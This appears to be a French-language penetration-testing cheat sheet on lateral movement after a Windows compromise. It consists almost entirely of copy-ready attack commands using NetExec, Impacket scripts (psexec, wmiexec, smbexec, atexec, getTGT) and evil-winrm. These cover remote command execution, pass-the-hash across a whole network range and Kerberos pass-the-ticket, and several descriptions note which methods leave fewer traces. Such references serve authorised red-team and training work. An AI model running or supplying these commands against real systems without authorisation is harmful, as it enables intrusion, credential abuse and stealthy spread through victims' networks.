Post-Exploitation

Lateral Movement

SMB, WMI, WinRM et Kerberos pour se déplacer latéralement entre les hôtes compromis.

Mouvement via SMB

Copy command
nxc smb $TARGET -u $USER -p $PASS -x 'whoami'

Description: Exécuter une commande via SMB/WMI : vérifier l'accès admin avant de pivoter.

Copy command
nxc smb $CIDR -u $USER -H $NTHASH --local-auth -x 'whoami'

Description: Pass-the-Hash avec hash local sur toute la plage réseau : trouver la réutilisation.

Copy command
psexec.py $DOMAIN/$USER:$PASS@$TARGET

Description: Shell interactif via PsExec : crée un service temporaire, bruyant mais fiable.

Copy command
wmiexec.py $DOMAIN/$USER:$PASS@$TARGET

Description: Shell semi-interactif via WMI : plus discret que PsExec, pas de service créé.

Copy command
smbexec.py $DOMAIN/$USER:$PASS@$TARGET

Description: Exécution via partage SMB : alternative à PsExec avec moins d'artifacts.

Pass-the-Ticket & Kerberos

Copy command
getTGT.py $DOMAIN/$USER -hashes :$NTHASH

Description: Obtenir un TGT avec le hash NT : base pour le mouvement latéral Kerberos.

Copy command
export KRB5CCNAME=$USER.ccache && nxc smb $TARGET -u $USER -p '' --use-kcache

Description: Utiliser le ticket ccache pour s'authentifier Kerberos sans mot de passe ni hash.

Copy command
atexec.py -k -no-pass $DOMAIN/$USER@$TARGET 'whoami'

Description: Exécution planifiée via Task Scheduler avec ticket Kerberos : discret et efficace.

WinRM & RDP

Copy command
nxc winrm $TARGET -u $USER -p $PASS

Description: Vérifier l'accès WinRM : prérequis pour evil-winrm ou les sessions PowerShell distantes.

Copy command
evil-winrm -i $TARGET -u $USER -p $PASS

Description: Shell PowerShell interactif via WinRM : pratique pour post-exploitation et upload/download.

Copy command
evil-winrm -i $TARGET -u $USER -H $NTHASH

Description: WinRM avec Pass-the-Hash : accès sans mot de passe en clair.